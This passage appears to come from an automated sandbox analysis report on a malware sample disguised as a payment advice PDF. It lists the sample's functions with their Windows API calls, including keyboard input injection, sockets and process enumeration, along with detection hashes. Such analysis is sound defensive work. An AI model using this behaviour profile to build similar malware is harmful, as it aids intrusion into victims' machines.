                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                              • String ID:
                                                              • API String ID: 3659485706-0
                                                              • Opcode ID: 458040d637e5ec7471d60b55443cbdaa2955ea5c509feaba119f036ffb89bf33
                                                              • Instruction ID: b09e0678b1fde8a790b094144c3c9aa07e5dabc84985b3497a62e1bc4f0bc0cd
                                                              • Opcode Fuzzy Hash: 458040d637e5ec7471d60b55443cbdaa2955ea5c509feaba119f036ffb89bf33
                                                              • Instruction Fuzzy Hash: 48C106716083059FC714DF28C480AAABBE4FF89714F14896EF999DB352D731E946CB82
                                                              Function 008B8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 008B80C3
                                                              • CoUninitialize.OLE32 ref: 008B80CE
                                                                • Part of subcall function 0089D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0089D5D4
                                                              • VariantInit.OLEAUT32(?), ref: 008B80D9
                                                              • VariantClear.OLEAUT32(?), ref: 008B83AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: 54c44ed3a3f9fd116de746416fdbb8222555c757828272e0060691522ad086b7
                                                              • Instruction ID: efae275a2d8ca0a4e2a2bcc68d3bc10449507b0aa3b98ee77a758749aa2c48ca
                                                              • Opcode Fuzzy Hash: 54c44ed3a3f9fd116de746416fdbb8222555c757828272e0060691522ad086b7
                                                              • Instruction Fuzzy Hash: B3A125756047059FDB20DF18C881A6AB7E8FF89754F044459F99ADB3A2CB30ED05CB86
                                                              Function 00897530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008D2C7C,?), ref: 008976EA
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008D2C7C,?), ref: 00897702
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,008CFB80,000000FF,?,00000000,00000800,00000000,?,008D2C7C,?), ref: 00897727
                                                              • _memcmp.LIBCMT ref: 00897748
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FromProg$FreeTask_memcmp
                                                              • String ID:
                                                              • API String ID: 314563124-0
                                                              • Opcode ID: 4a8088f65c79fbc0acbe95fad55848a6b834f9800e014e1ee45e106829f6b33a
                                                              • Instruction ID: fcd90dfbdb857ee170c03ea0a6c1619e9ef35a0330bf681e33e9d6efff8c4732
                                                              • Opcode Fuzzy Hash: 4a8088f65c79fbc0acbe95fad55848a6b834f9800e014e1ee45e106829f6b33a
                                                              • Instruction Fuzzy Hash: 9281F775A10109EFCF04DFA8C984EEEB7B9FF89315B244558E506EB250DB71AE06CB60
                                                              Function 0089687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 1b8000a987ba62e646b495be53f82c727e173fa1944a1cd1d88c161666cddbdb
                                                              • Instruction ID: d8206e2e80cb9d0d3d7e783b41d2c3652452f74d0e50e2958a9e5c751fe9c211
                                                              • Opcode Fuzzy Hash: 1b8000a987ba62e646b495be53f82c727e173fa1944a1cd1d88c161666cddbdb
                                                              • Instruction Fuzzy Hash: AB51A0746003059ADF24BF69D891A2EB7E6FF45314F28C81FE596EB291FB34D8608706
                                                              Function 008C97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(0162E840,?), ref: 008C9863
                                                              • ScreenToClient.USER32(00000002,00000002), ref: 008C9896
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 008C9903
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: ad39ac13a2b719d9938a7ec73abe86fdc4089414bcdc2e8c5c0cb71621e2fc49
                                                              • Instruction ID: 23d489b39893b53807632b269ea2f884690310756f2077c1cf1f6c819aab50a6
                                                              • Opcode Fuzzy Hash: ad39ac13a2b719d9938a7ec73abe86fdc4089414bcdc2e8c5c0cb71621e2fc49
                                                              • Instruction Fuzzy Hash: F751FA34A00609AFDB10CF58C888EAE7BB6FB55360F1481ADF995DB2A0D731ED41DB90
                                                              Function 00899A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00899AD2
                                                              • __itow.LIBCMT ref: 00899B03
                                                                • Part of subcall function 00899D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00899DBE
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00899B6C
                                                              • __itow.LIBCMT ref: 00899BC3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 0501d82efab7092638caad9974f54ed49e5ecb2cd2e8e9820c4c39ffbf24cb95
                                                              • Instruction ID: 33dcceae7169c873a1bf440bd458fb05ef4198fed52e588349c5c801ed1ff1c0
                                                              • Opcode Fuzzy Hash: 0501d82efab7092638caad9974f54ed49e5ecb2cd2e8e9820c4c39ffbf24cb95
                                                              • Instruction Fuzzy Hash: 45413D74A0021CABDF11EF68D885BAE7FB9FF44724F040069F945E6291DB749A44CBA2
                                                              Function 008B69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 008B69D1
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B69E1
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008B6A45
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B6A51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                              • String ID:
                                                              • API String ID: 2214342067-0
                                                              • Opcode ID: c10d28d3c90f164cdb24b8cf6852d795791030320715578a3bb7d77b1d1a73d0
                                                              • Instruction ID: 304ab9bd7d1dfa772d1d9699c722df2c8c4c577d73581caa464a7e7f88b5458a
                                                              • Opcode Fuzzy Hash: c10d28d3c90f164cdb24b8cf6852d795791030320715578a3bb7d77b1d1a73d0
                                                              • Instruction Fuzzy Hash: BB418F75640214AFEB60BF28CC86F6A77A5FF04B14F048428FA59EB3D3DA749D108792
                                                              Function 008B641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,008CF910), ref: 008B64A7
                                                              • _strlen.LIBCMT ref: 008B64D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID:
                                                              • API String ID: 4218353326-0
                                                              • Opcode ID: 6e9ffc944748fb717e3f13032a68df440ca28c9569deed872e757818f8ed0b63
                                                              • Instruction ID: 240ac6227a167fda89d09630d1f845ad8b0a61bfd803c3b6193658df6bfdb3da
                                                              • Opcode Fuzzy Hash: 6e9ffc944748fb717e3f13032a68df440ca28c9569deed872e757818f8ed0b63
                                                              • Instruction Fuzzy Hash: EC418231500118ABCB24EBA8DC85FEEB7A9FF44310F148155F919D7392EB34AD24CB52
                                                              Function 008AB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008AB89E
                                                              • GetLastError.KERNEL32(?,00000000), ref: 008AB8C4
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008AB8E9
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008AB915
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: 84da09d52ea07656e26393a2e82e441b063aa99b361b2e8d2ae0c145095a0183
                                                              • Instruction ID: 23b64d88758e497bcc7c97cf52a188bc4cb75b02fc942228b6b1b50da85e9460
                                                              • Opcode Fuzzy Hash: 84da09d52ea07656e26393a2e82e441b063aa99b361b2e8d2ae0c145095a0183
                                                              • Instruction Fuzzy Hash: A5410C35600514DFDB21DF19C445A5ABBE1FF8A310F198099ED8A9B762CB35FD01CB92
                                                              Function 008C8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008C88DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: cd3c15d1f509b1dcb48fb68f1bc8ab2296000cf29833a1151397290df4de31fc
                                                              • Instruction ID: 89ad2e5622923f24c4d28145e32fb9c0b10f913fc8bbbc9b56efdbaec29eaa26
                                                              • Opcode Fuzzy Hash: cd3c15d1f509b1dcb48fb68f1bc8ab2296000cf29833a1151397290df4de31fc
                                                              • Instruction Fuzzy Hash: 6531B034684108EFEB209A68DC45FB97BB5FB09310F94412AFA11E76A1CF70E9849B52
                                                              Function 008CAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 008CAB60
                                                              • GetWindowRect.USER32(?,?), ref: 008CABD6
                                                              • PtInRect.USER32(?,?,008CC014), ref: 008CABE6
                                                              • MessageBeep.USER32(00000000), ref: 008CAC57
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 7c87e7f147607bcd8916007352fe4dda094b4f5f8bfb13fded337b8ad957b9a1
                                                              • Instruction ID: e6f05fb8b7e1f23638039fce4d2bbb36a459d2a63f5c18005ea145c2938df079
                                                              • Opcode Fuzzy Hash: 7c87e7f147607bcd8916007352fe4dda094b4f5f8bfb13fded337b8ad957b9a1
                                                              • Instruction Fuzzy Hash: DC417930A0021D9FCB19DF58D884FA9BBF6FB49318F1881A9E914DB261D730E841DF92
                                                              Function 008A0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008A0B27
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 008A0B43
                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008A0BA9
                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008A0BFB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: fcb281c5fa4ae6f27397914b9951b8fae60f3ce467b67b69726384c5b4fe8d01
                                                              • Instruction ID: 86b822acbfd25b0b939036715cd86eff6e8a68b9bf5234627e71f9bfd2693ddf
                                                              • Opcode Fuzzy Hash: fcb281c5fa4ae6f27397914b9951b8fae60f3ce467b67b69726384c5b4fe8d01
                                                              • Instruction Fuzzy Hash: 6F313930A406186EFF348B698D05BF9BBA5FB47338F08425AE580D25D2C37589429B72
                                                              Function 008A0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 008A0C66
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 008A0C82
                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 008A0CE1
                                                              • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 008A0D33
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: e59f61ea6dba5f408532004f69f30a1ca70ddcd336624360f507a5eba06bf428
                                                              • Instruction ID: fb7f16829c873e0c40c7b0de12be785ffd88215018b7fc5ff796034245367db3
                                                              • Opcode Fuzzy Hash: e59f61ea6dba5f408532004f69f30a1ca70ddcd336624360f507a5eba06bf428
                                                              • Instruction Fuzzy Hash: 9A312630A4021C6FFF348B698805BFEBBB6FB47320F18431AE585D29D1D33999559B52
                                                              Function 008761C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008761FB
                                                              • __isleadbyte_l.LIBCMT ref: 00876229
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00876257
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0087628D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: d284a38484fb7acc4f1230a409ef08f819524be9b61230e2df41b1e1562a6ca6
                                                              • Instruction ID: 959cbf447d30228c761629fba79d85911d4ae1ca4d363cf80d490f4ac96c7d45
                                                              • Opcode Fuzzy Hash: d284a38484fb7acc4f1230a409ef08f819524be9b61230e2df41b1e1562a6ca6
                                                              • Instruction Fuzzy Hash: FE31C130600A46EFDF219F65CC48BAA7BB9FF42310F158029E828D71A6E731D960DB50
                                                              Function 008C4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 008C4F02
                                                                • Part of subcall function 008A3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008A365B
                                                                • Part of subcall function 008A3641: GetCurrentThreadId.KERNEL32 ref: 008A3662
                                                                • Part of subcall function 008A3641: AttachThreadInput.USER32(00000000,?,008A5005), ref: 008A3669
                                                              • GetCaretPos.USER32(?), ref: 008C4F13
                                                              • ClientToScreen.USER32(00000000,?), ref: 008C4F4E
                                                              • GetForegroundWindow.USER32 ref: 008C4F54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: 1c687e7ddce520747e670d85ef032704beeb9ab87ed20fefe1aaf059157c5846
                                                              • Instruction ID: 0b8631798b355d1848493696500499a8bc94d22de70b078d530187296d9aa6ee
                                                              • Opcode Fuzzy Hash: 1c687e7ddce520747e670d85ef032704beeb9ab87ed20fefe1aaf059157c5846
                                                              • Instruction Fuzzy Hash: ED313C71D00108AFDB10EFA9C885DEFB7F9FF99300F10406AE555E7201EA759E458BA1
                                                              Function 008A3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 008A3C7A
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 008A3C88
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 008A3CA8
                                                              • CloseHandle.KERNEL32(00000000), ref: 008A3D52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              • Opcode ID: c0644901ca046e11c0f235b4cebb2ca9faa751d46bc4ac6a6ca535a1ab0d037f
                                                              • Instruction ID: 60990fd6a3348fd7ee6374defcc964c962038be48950a6b87b581c4f76fedeb6
                                                              • Opcode Fuzzy Hash: c0644901ca046e11c0f235b4cebb2ca9faa751d46bc4ac6a6ca535a1ab0d037f
                                                              • Instruction Fuzzy Hash: 67316F71108349DFE301EF64D885AAEBBE8FF95354F50082DF582C61A2EB719A49CB53
                                                              Function 008CC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
